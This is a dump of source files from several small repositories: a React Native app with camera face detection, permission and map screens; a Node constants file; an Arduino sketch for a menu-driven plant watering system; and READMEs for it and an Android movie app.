import { setFacesDetected } from '../actions'
import { CameraRenderer as StatelessCameraRenderer } from '../components/CameraRenderer'
// Map camera slice state into props; an explicit 'activeCamera' navigation
// param overrides the store's active camera.
const mapStateToProps = (state, ownProps) => {
const { navigation } = ownProps
const { activeCamera, cameraZoom, detectedFaces } = state.camera
const paramActiveCamera = navigation.getParam('activeCamera', activeCamera)
// const wereParamsSupplied = ownProps.navigation.state.params !== null
return {
activeCamera: paramActiveCamera,
cameraZoom,
detectedFaces
}
}
// updateFaceData merges the captured photo into the face-detection payload
// before storing it.
const mapDispatchToProps = dispatch => {
return {
updateFaceData: (newFaceData, photo) => {
dispatch(setFacesDetected({
...newFaceData,
photo
}))
}
}
}
const CameraRenderer = connect(mapStateToProps, mapDispatchToProps)(StatelessCameraRenderer)
export { CameraRenderer }
<file_sep>/containers/PermissionDisplay.js
import React from 'react'
import { Text, View } from 'react-native'
import { Button } from 'react-native-elements'
import { connect } from 'react-redux'
import { Permissions } from 'expo'
import PropTypes from 'prop-types'
// import { CameraStatusDisplay } from '../components/CameraStatusDisplay'
import { PermissionObjectDisplay } from '../components/PermissionObjectDisplay'
import {
setPermissionCamera,
setPermissionLocation
} from '../actions'
// import { styles } from './styles'
const localStyles = {
buttonPermission: {
backgroundColor: '#0ff',
borderRadius: 99999,
borderWidth: 2,
marginVertical: 5,
paddingHorizontal: 75,
paddingVertical: 20,
shadowOffset: {
height: 10,
width: 10
},
shadowOpacity: .5,
shadowRadius: 10
},
container: {
backgroundColor: 'rgba(13, 13, 13, .5)',
flex: 1
},
header: {
color: '#eee',
fontSize: 18,
fontWeight: 'bold',
marginTop: 20,
textAlign: 'center'
}
}
/**
 * Screen listing the camera and location permission states, with a button
 * that prompts the user for both. Permission data lives in the Redux
 * permission slice and is loaded on mount.
 */
class StatelessPermissionDisplay extends React.Component {
static navigationOptions = {
headerTitle: 'Permissions'
}
componentDidMount() {
// Deferred so the dispatch runs after the initial render.
setTimeout(this.props.loadPermissionsAsync, 0)
}
render() {
return (
<View style={localStyles.container}>
{this._renderOverview()}
<View style={{ marginVertical: 10 }}>
<Button
buttonStyle={localStyles.buttonPermission} color="#333"
title="Prompt for permissions"
onPress={async () => await this.props.askPermissionsAsync()} />
</View>
</View>
)
}
// One status row per tracked permission.
_renderOverview = () =>
<View style={{ flex: 1 }}>
<PermissionObjectDisplay permission={this.props.permissionCamera} title={"Camera"} />
<PermissionObjectDisplay permission={this.props.permissionLocation} title={"Location"} />
{/* <CameraStatusDisplay activeCamera={this.state.activeCamera} /> */}
</View>
}
StatelessPermissionDisplay.propTypes = {
askPermissionsAsync: PropTypes.func.isRequired,
loadPermissionsAsync: PropTypes.func.isRequired,
permissionCamera: PropTypes.object,
permissionLocation: PropTypes.object
}
const mapStateToProps = state => {
const { permissionCamera, permissionLocation } = state.permission
return {
permissionCamera,
permissionLocation
}
}
const mapDispatchToProps = dispatch => {
return {
// Prompt the user for both permissions and cache the results.
askPermissionsAsync: async () => {
const permissionCamera = await Permissions.askAsync(Permissions.CAMERA)
const permissionLocation = await Permissions.askAsync(Permissions.LOCATION)
dispatch(setPermissionLocation(permissionLocation))
dispatch(setPermissionCamera(permissionCamera))
},
// Read the current permission states without prompting.
loadPermissionsAsync: async () => {
const permissionLocation = await Permissions.getAsync(Permissions.LOCATION)
const permissionCamera = await Permissions.getAsync(Permissions.CAMERA)
dispatch(setPermissionLocation(permissionLocation))
dispatch(setPermissionCamera(permissionCamera))
}
}
}
const PermissionDisplay = connect(mapStateToProps, mapDispatchToProps)(StatelessPermissionDisplay)
export { PermissionDisplay }
<file_sep>/tests/HomeScreen.test.js
import 'react-native'
import React from 'react'
import 'jest'
// import renderer from 'react-test-renderer'
// import { configure } from 'enzyme'
// import Adapter from 'enzyme-adapter-react-16'
// configure({ adapter: new Adapter() })
import { HomeScreen } from '../components/HomeScreen'
// Placeholder sanity check so the Jest suite has at least one passing test.
test('some dummy test', () => {
expect(1 + 4).toBe(5)
})
<file_sep>/App.js
import 'core-js' // NOTE: `core-js` required for Android emulator
import React from 'react'
// import { ImageBackground } from 'react-native'
import { ScrollView, Text, View } from 'react-native'
// import { Button } from 'react-native-elements'
import { Provider } from 'react-redux'
import { createStackNavigator } from 'react-navigation'
import { CameraRenderer } from './containers/CameraRenderer'
import { HomeScreen } from './components/HomeScreen'
import { TitleBar } from './components/TitleBar'
import { CameraRollRenderer } from './containers/CameraRollRenderer'
import { PermissionDisplay } from './containers/PermissionDisplay'
import { LocationRenderer } from './containers/LocationRenderer'
import { store } from './store'
import { styles } from './styles'
const localStyles = { }
const RootStack = createStackNavigator(
{
// Home: {
// screen: HomeScreen
// },
Home: HomeScreen,
// Camera: {
// screen: CameraRenderer
// }
Camera: CameraRenderer,
CameraRoll: CameraRollRenderer,
Map: LocationRenderer,
Permission: PermissionDisplay
},
{
initialRouteName: 'Home',
navigationOptions: {
headerStyle: {
backgroundColor: 'rgba(0, 255, 255, 1)',
},
headerTintColor: '#333',
headerTitle: <TitleBar>default navigation title in App.js</TitleBar>,
// headerTitleStyle: {
// fontWeight: 'bold'
// }
}
}
)
/**
 * Application root: wraps the navigation stack in the Redux Provider so every
 * screen can connect to the store.
 */
class App extends React.Component {
render() {
return (
<View style={{
backgroundColor: '#00a',
flex: 1,
justifyContent: 'space-around'
}}>
<View style={{
backgroundColor: '#0a0',
flex: 1
}}>
<Provider store={store}>
<RootStack />
</Provider>
{/* <CameraRollRenderer /> */}
</View>
</View>
)
}
}
export { App }
export default App
<file_sep>/containers/LocationRenderer.js
import React from 'react'
import { Text, View } from 'react-native'
import { Button } from 'react-native-elements'
import { Location, MapView, Permissions, PROVIDER_GOOGLE } from 'expo'
import { connect } from 'react-redux'
import moment from 'moment-timezone'
import {
setNewLocation,
setPermissionLocation,
setUpdatingLocation
} from '../actions'
// import DefaultProps from 'prop-types'
// import { styles } from '../styles'
import aubergineMapStyle from '../assets/AubergineMapStyle.json'// NOTE: from https://mapstyle.withgoogle.com/
const localStyles = {
buttonGetLocation: {
backgroundColor: '#3f3',
borderRadius: 99999,
borderWidth: 2,
marginVertical: 5,
paddingHorizontal: 75,
paddingVertical: 20,
shadowOffset: {
height: 10,
width: 10
},
shadowOpacity: .5,
shadowRadius: 10
},
container: {
alignItems: 'stretch',
backgroundColor: 'rgba(13, 13, 13, .5)',
flex: 1,
flexDirection: 'column',
justifyContent: 'flex-end',
paddingBottom: 10
}
}
/**
 * Map screen: shows the last device fix on a Google map and offers a button
 * to fetch a new fix. Location/permission data comes from the Redux store.
 */
class StatelessLocationRenderer extends React.Component {
static navigationOptions = ({ navigation }) => {
let headerTitle = 'Map'
return { headerTitle }
}
// NOTE(review): declared here but never read by the class's own methods —
// mapDispatchToProps below references `this.locationLookupOptions` from
// module scope, where `this` is not this instance. Verify the options are
// actually applied.
locationLookupOptions = {
enableHighAccuracy: true
}
// Intended polling interval (ms) for the disabled timer code below.
locationRefreshDelay = 1000
// locationUpdateTimer = null
componentDidMount() {
// Deferred so the dispatch runs after the initial render.
setTimeout(this.props.loadPermissionsAsync, 0)
}
// componentWillUnmount() {
// if (this.locationUpdateTimer) {
// clearInterval(this.locationUpdateTimer)
// this.locationUpdateTimer = null
// }
// }
render () {
// Without the location permission only an error banner is shown.
if (!this.props.permissionLocation) {
return (
<View style={{
alignSelf: 'stretch',
// NOTE(review): '#rgba(255, 0, 0, .5)' is not a valid color string (stray
// '#') — confirm the intended background actually renders.
backgroundColor: '#rgba(255, 0, 0, .5)',
flex: 1,
justifyContent: 'flex-start',
paddingTop: 25
}}>
<Text style={{ textAlign: 'center' }}>Location permission was missing</Text>
</View>
)
}
return (
<View style={localStyles.container}>
{/*
<Text style={{ textAlign: 'center' }}>Location Renderer</Text>
<Text style={{ textAlign: 'center' }}>Location is {this.props.locationIsUpdating ? 'updating...' : 'updated.'}</Text>
*/}
{this._renderCurrentLocation(this.props.locationResult, this.props.mapRegion)}
<Button
title="Update location once"
buttonStyle={[ localStyles.buttonGetLocation ]}
onPress={async () => await this.props.getLocationAsync()} />
</View>
// <View style={styles.locationDisplay}>
// <View style={styles.mapViewContainer}>
// {/*
// <Button
// title="Start locator"
// color="#0000aa"
// onPress={async() => await this._startLocationTimer()} />
// */}
// </View>
// </View>
)
}
// Render the map centred on the last fix, plus its timestamp; renders
// nothing until both a location and a region exist.
_renderCurrentLocation = (location, mapRegion) => {
if (!location || !mapRegion) {
return null
}
const timestampInt = parseInt(location.timestamp, 10)
const formattedTime = moment(timestampInt).format('MMM Do YY hh:mm:ss a')
return (
<View style={{
alignItems: 'center',
flex: 1,
justifyContent: 'space-evenly'
}}>
<MapView
style={{
flex: .9,
// height: 300,
width: 300
}}
provider={PROVIDER_GOOGLE}
customMapStyle={aubergineMapStyle}
region={mapRegion}
// onRegionChange={this._handleMapRegionChange}
>
<MapView.Marker
coordinate={location.coords}
title="My Location"
description="Where I'm currently at"
/>
</MapView>
<Text>Last updated: {formattedTime}</Text>
</View>
)
}
// _handleMapRegionChange = mapRegion => {
// console.log(`[LocationRenderer][_handleMapRegionChange] Updated mapRegion=${JSON.stringify(mapRegion, null, 4)}`)
// this.setState({ mapRegion })
// }
// _startLocationTimer = () => this.locationUpdateTimer = setInterval(this._getLocationAsync, this.locationRefreshDelay)
}
// Expose the location slice plus the location permission.
const mapStateToProps = state => {
const { permissionLocation } = state.permission
const { locationIsUpdating, locationResult, mapRegion } = state.location
return {
locationIsUpdating,
locationResult,
mapRegion,
permissionLocation
}
}
const mapDispatchToProps = dispatch => {
  return {
    /**
     * Fetch a single high-accuracy position fix and push it into the store.
     * BUG FIX: the previous code passed `this.locationLookupOptions`, but
     * `this` inside a module-level arrow function is not the component
     * instance (undefined in an ES module), so the options were never valid —
     * build them locally instead.
     */
    getLocationAsync: async () => {
      // dispatch(setUpdatingLocation(true))
      const location = await Location.getCurrentPositionAsync({ enableHighAccuracy: true })
      dispatch(setNewLocation(location))
    },
    // Read the current location permission (no prompt) and cache it.
    loadPermissionsAsync: async () => {
      const permissionLocation = await Permissions.getAsync(Permissions.LOCATION)
      dispatch(setPermissionLocation(permissionLocation))
    }
  }
}
const LocationRenderer = connect(mapStateToProps, mapDispatchToProps)(StatelessLocationRenderer)
export { LocationRenderer }
<file_sep>/utils.js
import React from 'react'
import { View } from 'react-native'
// import { styles } from './styles'
// Wrap an element in a flex View that adds a 10px bottom margin (simple vertical spacer).
const wrapWithMarginBottom = jsxElement => <View style={{flex:1, marginBottom: 10}}>{jsxElement}</View>
export {
wrapWithMarginBottom
}
<file_sep>/components/CameraRenderer.js
import React from 'react'
// import { Image, Text, TouchableOpacity } from 'react-native'
import { View } from 'react-native'
import { Button } from 'react-native-elements'
import { Camera } from 'expo'
import PropTypes from 'prop-types'
// import { BASE_64_PREFIX } from '../constants/strings'
import { ZoomControl } from '../containers/ZoomControl'
const cameraQuality = 0.1
const landmarkSize = 5
const localStyles = {
blankBackground: {
backgroundColor: '#444',
flex: 1,
margin: 10
},
buttonSwitchCamera: {
backgroundColor: '#fa0',
borderRadius: 99999,
borderWidth: 2,
marginVertical: 5,
paddingHorizontal: 75,
paddingVertical: 20,
shadowOffset: {
height: 10,
width: 10
},
shadowOpacity: .5,
shadowRadius: 10
},
camera: {
flex: 1,
overflow: 'hidden'
},
container: {
alignItems: 'stretch',
backgroundColor: 'rgba(13, 13, 13, .5)',
flex: 1,
flexDirection: 'column',
justifyContent: 'flex-end',
paddingBottom: 10
},
// cameraTouchable: {
// alignSelf: 'flex-end',
// backgroundColor: 'rgba(200,200,200,.65)',
// // TODO: figure out why js file can use '100%', but this file must use number
// borderRadius: 99999,
// flex: 1,
// margin: 20,
// maxHeight: 80,
// width: 80
// },
face: {
backgroundColor: 'rgba(0, 0, 0, 0.55)',
borderColor: '#fa0',
borderWidth: 2
},
landmark: {
backgroundColor: '#f00',
height: landmarkSize,
position: 'absolute',
width: landmarkSize
}
}
// Draw a bordered rectangle over one detected face, using the bounds
// (origin + size) reported by the Expo face detector.
const renderFaceHighlight = face => {
const { origin, size } = face.bounds
const { height, width } = size
return (
<View
style={[
localStyles.face,
{
// ...face.bounds.size,// NOTE: alternative for width and height
height,
// position: 'absolute',
left: origin.x,
top: origin.y,
width
}
]}
// transform={[
// { perspective: 1000 },
// { rotateY: `${face.yawAngle.toFixed(0)}deg` },
// { rotateZ: `${face.rollAngle.toFixed(0)}deg` },
// ]}
>
{/*
{CameraRenderer.renderLandmark(face.leftEyePosition, origin)}
{CameraRenderer.renderLandmark(face.rightEyePosition, origin)}
*/}
{/*
<Image
source={{ uri: `${BASE_64_PREFIX}${this.state.detectedFaces.photo.base64}` }}
style={{ height: 50, width: 50 }} />
*/}
</View>
)
}
/**
 * Face-finder camera screen: renders the active Expo Camera, highlights the
 * first detected face, captures a photo on each detection, and lets the user
 * switch cameras (via a navigation param) and adjust zoom.
 */
class CameraRenderer extends React.Component {
static navigationOptions = ({ navigation }) => {
const paramActiveCamera = navigation.getParam('activeCamera', null)
let headerTitle = ''
if (paramActiveCamera === Camera.Constants.Type.front) {
headerTitle = 'Front Camera (Face Finder)'
} else if (paramActiveCamera === Camera.Constants.Type.back) {
headerTitle = 'Rear Camera (Face Finder)'
}
return { headerTitle }
}
camera = null// NOTE: property is set in _setCameraReference
render () {
// TODO: fix when facesDetected gets fired one time after switch active camera
// and thus the face highlight shows up after camera switches
// console.log(`faces is null ? ${detectedFaces === null}`)
return (
<View style={localStyles.container}>
<View style={localStyles.blankBackground}>
{this.props.activeCamera &&
<Camera ref={this._setCameraReference}
style={localStyles.camera}
type={this.props.activeCamera}
zoom={this.props.cameraZoom}
faceDetectionClassifications={Camera.Constants.FaceDetection.Classifications.all}
faceDetectionLandmarks={Camera.Constants.FaceDetection.Landmarks.all}
faceDetectionMode={Camera.Constants.FaceDetection.Mode.accurate}// or .fast
onBarCodeRead={this._handleBarCodeRead}
onFacesDetected={this._handleFacesDetected}>
{this.props.detectedFaces &&
<View style={{
// backgroundColor: 'rgba(0, 255, 0, .5)',
flex: 1
// position: 'absolute', top: 0, left: 0, right: 0, bottom: 0
}}>
{/* Only the first face is highlighted; detectedFaces is only stored when
at least one face was present (see _handleFacesDetected). */}
{renderFaceHighlight(this.props.detectedFaces.faces[0])}
{/*
{CameraRenderer.renderLandmark(detectedFaces.faces[0].leftEyePosition, detectedFaces.faces[0].bounds.origin)}
{CameraRenderer.renderLandmark(detectedFaces.faces[0].rightEyePosition, detectedFaces.faces[0].bounds.origin)}
*/}
</View>
}
{/*
<TouchableOpacity style={localStyles.cameraTouchable} onPress={this._takePicture} />
*/}
</Camera>
}
</View>
<ZoomControl cameraZoom={this.props.cameraZoom} />
<Button
buttonStyle={localStyles.buttonSwitchCamera} title="Switch Camera"
onPress={this._handleSwitchCamera} />
</View>
)
}
// Barcode events are currently ignored.
_handleBarCodeRead = barCodeData => {
// console.log(`Got barcode in camera=${JSON.stringify(barCodeData, null, 4)}`)
}
// On each detection with >= 1 face, capture a low-quality base64 photo and
// hand it to the store together with the face data; capture errors are
// deliberately swallowed (best-effort).
_handleFacesDetected = faceData => {
if (!this.camera || faceData.faces.length < 1) {
return
}
this.camera.takePictureAsync({
base64: true,
exif: false,
quality: cameraQuality
})
.then(photo => {
this.props.updateFaceData(faceData, photo)
})
.catch(err => {
// console.info(`Error taking picture = ${JSON.stringify(err, null, 4)}`)
})
}
// Flip the 'activeCamera' navigation param between front and back.
_handleSwitchCamera = () => {
switch (this.props.activeCamera) {
case Camera.Constants.Type.front:
this.props.navigation.setParams({ activeCamera: Camera.Constants.Type.back })
break
case Camera.Constants.Type.back:
this.props.navigation.setParams({ activeCamera: Camera.Constants.Type.front })
break
}
}
// Capture the Camera component instance for takePictureAsync.
_setCameraReference = cameraReference => this.camera = cameraReference
}
CameraRenderer.propTypes = {
activeCamera: PropTypes.oneOf([null, Camera.Constants.Type.back, Camera.Constants.Type.front]),
cameraZoom: PropTypes.number,
detectedFaces: PropTypes.object,
navigation: PropTypes.shape({
getParam: PropTypes.func.isRequired
}).isRequired,
updateFaceData: PropTypes.func.isRequired
}
export { CameraRenderer }
| 045ce866f8ed01bae65b5807cbf6a4634a98b97d | [
"JavaScript",
"Markdown"
] | 16 | JavaScript | Wolven531/react-native-tracker | 987bbf42a83e59d6025b78f7f0b3dd5e1e850fea | 7c813db0f003f588e7a9318f1aee2e1df31b6c28 |
refs/heads/main | <repo_name>panyofai/pany.github.io-<file_sep>/utils/constant.js
// Secret/key constants (translated from Chinese: "secret key constants").
module.exports = {
// NOTE(review): value was redacted to '<PASSWORD>' in this dump; the real
// salt should come from configuration — committed secrets are a risk.
PWD_SALT: '<PASSWORD>',
PRIVATE_KEY: 'dogee_blog',
EXPIRESD: 60*60*24, // unit: seconds (translated from Chinese "单位s")
}
| 048a30c3284ea652487897458bb95f38fe984025 | [
"JavaScript"
] | 1 | JavaScript | panyofai/pany.github.io- | 024b5a108c1afe5791c647506119b4abd6371b57 | 189362f324af08f2d5660e564f82f21671d1eef7 |
refs/heads/master | <repo_name>anhhao135/modular-watering-system<file_sep>/modular-watering-system.ino
#include <Servo.h>
#include <Stepper.h>
#include <Wire.h>
#include <LiquidCrystal_I2C.h>
#include <dht.h>
#include <rotary.h>
Rotary r = Rotary(2, 3,4); // there is no must for using interrupt pins !!
// Half-step mode
#define HALF_STEP
// Define I2C_LCD
LiquidCrystal_I2C lcd(0x27, 20,4);
// Define your Function information
int maxNumber = 14;
char* myFunctions[] = {
"Home Module 1",
"Home Module 2",
"Home Module 3",
"Check Water Level",
"Turn Pump On",
"Turn Pump Off",
"Module 1 Moisture",
"Module 2 Moisture",
"Module 3 Moisture",
"Check Temperature",
"Check Humidity",
"Water Module 1",
"Water Module 2",
"Water Module 3",
};
int x = 0;
#define DHT11_PIN 12
#define STEPS 2038
#define FULL_MOISTURE_1 290
#define NO_MOISTURE_1 620
#define FULL_MOISTURE_2 250
#define NO_MOISTURE_2 590
#define FULL_MOISTURE_3 290
#define NO_MOISTURE_3 600 //callibrate lower and upper ranges of moisture sensors
#define ANGLE_1 22
#define ANGLE_2 46
#define ANGLE_3 70
#define LOWERED_ANGLE 45
#define RETRACT_ANGLE 95
dht DHT;
Stepper moduleOne (STEPS,25,23,24,22);
Stepper moduleTwo (STEPS,33,31,32,30);
Stepper moduleThree (STEPS,49,47,48,46);
int basePin = 10;
int armPin = 11;
int relayPin = 7;
int colOne = A0;
int colTwo = A1;
int colThree = A2;
int moistOne = A3;
int moistTwo = A4;
int moistThree = A5;
Servo base;
Servo arm;
// One-time hardware init: serial port, LCD splash screens, first menu entry,
// pump relay default state, and stepper speeds for the three watering modules.
// blinkLCD() and pump_off() are defined elsewhere in this sketch.
void setup() {
// put your setup code here, to run once:
Serial.begin(9600);
lcd.begin();
lcd.backlight();
lcd.clear (); // go home
lcd.setCursor(0,0);
lcd.print ("Modular Watering");
lcd.setCursor(0, 1);
lcd.print("System");
lcd.setCursor(0, 2);
lcd.print("M.W.S.");
lcd.setCursor(0,3);
lcd.print("(c) TREEHUGGERS 2019");
delay(3000);
lcd.clear();
lcd.print("Select Function");
delay(2000);
//lcd.backlight(); // only needed for 0x3F I2C Adapter
// ------- Quick 3 blinks of backlight -------------
blinkLCD();
// Show the first menu entry ("Function #: 01" fits the 20-char buffer).
char lcdline1[20];
sprintf (lcdline1, "Function #: %02i", x + 1); // index starts at 0
lcd.setCursor(0, 0);
lcd.print (lcdline1);
lcd.setCursor(0, 1);
lcd.print(myFunctions[x]);
// Pump stays off until explicitly enabled from the menu.
pump_off();
moduleOne.setSpeed(10);
moduleTwo.setSpeed(10);
moduleThree.setSpeed(10);
delay(1000);
}
void loop() {
volatile unsigned char result = r.process();
if (result) {
result == DIR_CCW ? x = x - 1 : x = x + 1;
if (x < 0) { // no values < 0; later: use unsigned int
blinkLCD();
x = maxNumber - 1; // roll over
}
if (x > maxNumber - 1) { // no more strings
// ------- Quick 3 blinks of backlight -------------
blinkLCD();
x = 0; // roll over
}
char lcdline1[13];
sprintf (lcdline1, "Function #: %02i", x + 1);
lcd.setCursor(0, 0);
lcd.print (lcdline1);
lcd.setCursor(0, 1);
lcd.print(" "); // erase previous content
lcd.setCursor(0, 1);
lcd.print(myFunctions[x]);
}
if (r.buttonPressedReleased(25)) {
switch (x) {
case 0:
lcdScreen1();
Function_1();
break;
case 1:
lcdScreen1();
Function_2();
break;
case 2:
lcdScreen1();
Function_3();
break;
case 3:
lcdScreen1();
Function_4();
break;
case 4:
lcdScreen1();
Function_5();
break;
case 5:
lcdScreen1();
Function_6();
break;
case 6:
lcdScreen1();
Function_7();
break;
case 7:
lcdScreen1();
Function_8();
break;
case 8:
lcdScreen1();
Function_9();
break;
case 9:
lcdScreen1();
Function_10();
break;
case 10:
lcdScreen1();
Function_11();
break;
case 11:
lcdScreen1();
Function_12();
break;
case 12:
lcdScreen1();
Function_13();
break;
case 13:
lcdScreen1();
Function_14();
break;
}
blinkLCD();
lcd.clear (); // go home
lcd.print ("");
lcd.setCursor(0, 1);
lcd.print("Function Executed!"); //
delay(1500);
//lcd.backlight(); // only needed for 0x3F I2C Adapter
// ------- Quick 3 blinks of backlight -------------
blinkLCD();
x = 0; // reset to start position
lcd.clear();
char lcdline1[13];
sprintf (lcdline1, "Function #: %02i", x + 1);
lcd.print (lcdline1);
lcd.setCursor(0, 1);
lcd.print(myFunctions[x]);
}
}
void homePlate (int module){
if(module == 1){
lcd.clear();
lcd.print("HOMING MODULE 1");
while(analogRead(colOne) > 500){
moduleOne.step(1);
}
}
if(module == 2){
lcd.clear();
lcd.print("HOMING MODULE 2");
while(analogRead(colTwo)> 500){
moduleTwo.step(1);
}
}
if(module == 3){
lcd.clear();
lcd.print("HOMING MODULE 3");
while(analogRead(colThree) > 500){
moduleThree.step(1);
}
}
digitalWrite(25, LOW);
digitalWrite(23, LOW);
digitalWrite(24, LOW);
digitalWrite(22, LOW);
digitalWrite(30, LOW);
digitalWrite(31, LOW);
digitalWrite(32, LOW);
digitalWrite(33, LOW);
digitalWrite(46, LOW);
digitalWrite(47, LOW);
digitalWrite(48, LOW);
digitalWrite(49, LOW);
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" HOMED!");
delay(200);
}
double check_moisture(int module){
if(module == 1){
double raw = analogRead(moistOne);
double percent = (NO_MOISTURE_1 - raw) / (NO_MOISTURE_1 - FULL_MOISTURE_1);
lcd.clear();
lcd.print("MODULE 1 MOISTURE:");
lcd.setCursor(0,1);
lcd.print(percent*100);
lcd.print(" %");
delay(100);
return percent * 100;
}
if(module == 2){
double raw = analogRead(moistTwo);
double percent = (NO_MOISTURE_2 - raw) / (NO_MOISTURE_2 - FULL_MOISTURE_2);
lcd.clear();
lcd.print("MODULE 2 MOISTURE:");
lcd.setCursor(0,1);
lcd.print(percent*100);
lcd.print(" %");
delay(100);
return percent * 100;
}
if(module == 3){
double raw = analogRead(moistThree);
double percent = (NO_MOISTURE_3 - raw) / (NO_MOISTURE_3 - FULL_MOISTURE_3);
lcd.clear();
lcd.print("MODULE 3 MOISTURE:");
lcd.setCursor(0,1);
lcd.print(percent*100);
lcd.print(" %");
delay(100);
return percent * 100;
}
}
double check_temperature(){
int chk = DHT.read11(DHT11_PIN);
delay(500);
lcd.clear();
lcd.print("TEMPERATURE: ");
lcd.print((int)DHT.temperature);
lcd.print(" C");
lcd.setCursor(0,2);
lcd.print("FOR AMERICANS: ");
lcd.print((int)((DHT.temperature * 1.8) + 32));
lcd.print(" F");
return DHT.temperature; //has a period of 1.5s.
}
double check_humidity(){
int chk = DHT.read11(DHT11_PIN);
delay(500);
lcd.clear();
lcd.print("HUMIDITY: ");
lcd.print((int)DHT.humidity);
lcd.print(" %");
return DHT.humidity; //has a period of 1.5s.
}
bool check_waterlevel(){
int raw = analogRead(A8);
if (raw <950){
lcd.clear();
lcd.print("WATER LEVEL OK!");
delay(100);
return 1;
}
else{
lcd.clear();
lcd.print("WATER LOW");
delay(300);
return 0;
}
}
void move_base_to(int module){
base.attach(basePin);
if (module == 1){
base.write(ANGLE_1);
}
if (module == 2){
base.write(ANGLE_2);
}
if (module == 3){
base.write(ANGLE_3);
}
delay(2000);
base.detach();
}
void lower_arm(){
int angle;
arm.attach(armPin);
for(angle = RETRACT_ANGLE; angle > LOWERED_ANGLE ; angle--)
{
arm.write(angle);
delay(15);
}
}
void retract_arm(){
int angle;
for(angle = LOWERED_ANGLE; angle < RETRACT_ANGLE ; angle++)
{
arm.write(angle);
delay(15);
}
delay(1000);
arm.detach();
}
void pump_on(){
pinMode(relayPin, OUTPUT);
digitalWrite(relayPin, LOW);
}
void pump_off(){
digitalWrite(relayPin, HIGH);
}
int water_until_moist(int module){
lcd.clear();
lcd.print("WATERING MODULE ");
lcd.print(module);
delay(500);
pinMode(relayPin, OUTPUT);
if (module == 3){
int water_level = check_waterlevel();
int moisture = check_moisture(3);
move_base_to(3);
lower_arm();
delay(1000);
if (check_moisture(3) > 90){
retract_arm();
return 1;
}
if(check_waterlevel == 0){
retract_arm();
return 0;
}
while (water_level == 1 && moisture <90 ){
moisture = check_moisture(3);
water_level = check_waterlevel();
pump_on();
}
pump_off();
delay(500);
retract_arm();
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" WATERED!");
if(check_waterlevel == 0){
retract_arm();
return 0;
}
else return 1;
}
if (module == 2){
int water_level = check_waterlevel();
int moisture = check_moisture(2);
move_base_to(2);
lower_arm();
delay(1000);
if (check_moisture(2) > 90){
retract_arm();
return 1;
}
if(check_waterlevel == 0){
retract_arm();
return 0;
}
while (water_level == 1 && moisture <90 ){
moisture = check_moisture(2);
water_level = check_waterlevel();
pump_on();
}
pump_off();
delay(500);
retract_arm();
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" WATERED!");
if(check_waterlevel == 0){
retract_arm();
return 0;
}
else return 1;
}
if (module == 1){
int water_level = check_waterlevel();
int moisture = check_moisture(1);
move_base_to(1);
lower_arm();
delay(1000);
if (check_moisture(1) > 90){
retract_arm();
return 1;
}
if(check_waterlevel == 0){
retract_arm();
return 0;
}
while (water_level == 1 && moisture <90 ){
moisture = check_moisture(1);
water_level = check_waterlevel();
pump_on();
}
pump_off();
delay(500);
retract_arm();
lcd.clear();
lcd.print("MODULE ");
lcd.print(module);
lcd.print(" WATERED!");
if(check_waterlevel == 0){
retract_arm();
return 0;
}
else return 1;
}
}
void plate_counterclockwise (int module){
if (module == 1){
moduleOne.step(1);
}
if (module == 2){
moduleTwo.step(1);
}
if (module == 3){
moduleThree.step(1);
}
}
void plate_clockwise (int module){
if (module == 1){
moduleOne.step(-1);
}
if (module == 2){
moduleTwo.step(-1);
}
if (module == 3){
moduleThree.step(-1);
}
}
void homeAll(){
homePlate(1);
homePlate(2);
homePlate(3);
}
void blinkLCD() {
for (int i = 0; i < 3; i++)
{
lcd.noBacklight();
delay(50);
lcd.backlight();
delay(50);
}
}
void lcdScreen1() { // instead of the real mixing process, just for demo
lcd.setCursor(0, 0);
lcd.print("Now Executing ");
// scroll 13 positions (string length) to the left
// to move it offscreen left:
for (int positionCounter = 0; positionCounter < 5; positionCounter++) {
// scroll one position left:
lcd.scrollDisplayLeft();
// wait a bit:
delay(200);
}
// scroll 29 positions (string length + display length) to the right
// to move it offscreen right:
for (int positionCounter = 0; positionCounter < 5; positionCounter++) {
// scroll one position right:
lcd.scrollDisplayRight();
// wait a bit:
delay(200);
}
}
void Function_1() {
homePlate(1);
// produce the requested Function -> stepper motor actions
}
void Function_2() {
homePlate(2);
// produce the requested Function -> stepper motor actions
}
void Function_3() {
homePlate(3);
// produce the requested Function -> stepper motor actions
}
void Function_4() {
while(digitalRead(4) == 1){
check_waterlevel();
}
// produce the requested Function -> stepper motor actions
}
void Function_5() {
while(digitalRead(4) == 1){
pump_on();
}
pump_off();
// produce the requested Function -> stepper motor actions
}
void Function_6() {
pump_off();
// produce the requested Function -> stepper motor actions
}
void Function_7() {
while(digitalRead(4) == 1){
check_moisture(1);
delay(2500);
}
// produce the requested Function -> stepper motor actions
}
void Function_8() {
while(digitalRead(4) == 1){
check_moisture(2);
delay(2500);
// produce the requested Function -> stepper motor actions
}
}
void Function_9() {
while(digitalRead(4) == 1){
check_moisture(3);
delay(2500);
// produce the requested Function -> stepper motor actions
}
}
void Function_10() {
while(digitalRead(4) == 1){
check_temperature();
delay(2500);
}
// produce the requested Function -> stepper motor actions
}
void Function_11() {
while(digitalRead(4) == 1){
check_humidity();
delay(2500);
}
// produce the requested Function -> stepper motor actions
}
void Function_12() {
water_until_moist(1);
// produce the requested Function -> stepper motor actions
}
void Function_13() {
water_until_moist(2);
// produce the requested Function -> stepper motor actions
}
void Function_14() {
water_until_moist(3);
// produce the requested Function -> stepper motor actions
}
void demo(){
while(digitalRead(4) == 1){
}
}
<file_sep>/README.md
# modular-watering-system
Spring 2019 QP Project
Contains Arduino code for the Modular Watering System created by Team 13 of UCSD IEEE's Quarterly Projects of Spring 2019. This project won first place.
<hr>
Collaborators:
<NAME>: hardware and low-level Arduino code
<NAME>: Blynk/Arduino code
| 16c3016d1c4ccd95d3ec2fdfbb96d886a21fd3dc | [
"Markdown",
"C++"
] | 2 | C++ | anhhao135/modular-watering-system | ffcd42a9173cd29d510c4493fb03a2b913b44e24 | ee552c01ef407afa0d83e825a320d94ef286900f |
refs/heads/master | <repo_name>cristian-vescan/PopularMovies<file_sep>/README.md
# PopularMovies
Udacity PopularMovies
Add the folowing lines in project `gradle.properties`
#MovieDB Api String
MOVIEDB_API_KEY="your api key"
<file_sep>/app/src/main/java/ro/go/vescan/popularmovies/model/Movie.java
package ro.go.vescan.popularmovies.model;
import android.annotation.SuppressLint;
import android.os.Parcel;
import android.os.Parcelable;
